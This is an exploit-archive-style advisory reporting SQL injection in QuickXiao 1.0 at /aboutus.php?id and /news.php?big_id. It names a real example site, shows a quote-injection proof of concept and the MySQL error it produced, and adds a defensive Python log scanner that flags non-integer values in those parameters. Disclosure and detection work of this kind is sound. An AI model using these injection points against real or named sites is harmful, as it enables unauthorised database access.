Quick Sales Network QuickXiao version 1.0 suffers from a remote SQL injection vulnerability.
####################################################################################
# Exploit Title : Quick Sales Network QuickXiao 1.0 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Date : 30/12/2018
# Vendor Homepage : Quickxiao.Com
# Tested On : Windows
# Exploit Risk : Medium
# Category : WebApps
# Version Information : 1.0
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# Cyberizm.Org Exploit Reference Link : cyberizm.org/cyberizm-technical-support-quick-sales-network-quickxiao-sql-inj.html
####################################################################################
+ China Technical Support Quick Sales Network Quickxiao.Com SQL Injection Vulnerability
It means in English => Technical Support : Quick Sales Network
####################################################################################
# Exploit : /aboutus.php?id=[SQL Injection]
# Exploit : /news.php?big_id=[SQL Injection]
####################################################################################
# Example Site => shaodejixie.com/aboutus.php?id=1%27 => [ Proof of Concept for SQL Inj ] => archive.is/k3pVY
# SQL/DB Error :
Error! info: Can not Select to MySQL server!
Script: /aboutus.php
Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' and type=0 and language=0' at line 1
Error : 1064
####################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################################
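
For defenders, a log check for the two injection points listed above, as an added example that is not part of the original advisory: it flags requests where `id` on /aboutus.php or `big_id` on /news.php is not a plain decimal integer. That these parameters should only ever carry integers, the combined access-log format, and the sample log lines are assumptions of the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Scripts and parameters named in the advisory. That each one is meant to
# carry only a decimal integer is an assumption of this example.
WATCHED = {"/aboutus.php": "id", "/news.php": "big_id"}
INTEGER = re.compile(r"[0-9]{1,10}")

# Client address, request target and status from a "combined" access log entry.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log (documentation-range addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Dec/2018:10:00:01 +0000] "GET /aboutus.php?id=3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [30/Dec/2018:10:00:05 +0000] "GET /aboutus.php?id=1%27 HTTP/1.1" 200 312',
    '192.0.2.10 - - [30/Dec/2018:10:00:09 +0000] "GET /news.php?big_id=2 HTTP/1.1" 200 8044',
    '198.51.100.7 - - [30/Dec/2018:10:00:12 +0000] "GET /news.php?big_id=abc HTTP/1.1" 200 298',
    '192.0.2.10 - - [30/Dec/2018:10:00:15 +0000] "GET /index.php?id=abc HTTP/1.1" 200 100',
]


def check_target(target):
    """Return (param, decoded value) when a watched parameter is not a plain integer."""
    parts = urlsplit(target)
    # Lower-case the path: the advisory was tested on Windows, where paths ignore case.
    param = WATCHED.get(parts.path.lower())
    if param is None:
        return None
    # parse_qs percent-decodes values and keeps every repeat of the parameter.
    for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
        if not INTEGER.fullmatch(value):
            return param, value
    return None


def scan(lines):
    """Return one finding per log line whose watched parameter fails validation."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = LOG_LINE.match(line)
        hit = check_target(match["target"]) if match else None
        if hit:
            findings.append({"line": number, "ip": match["ip"], "param": hit[0],
                             "value": hit[1], "status": int(match["status"])})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only check, applied in the application before the value reaches the query, rejects the input behind the MySQL error shown above.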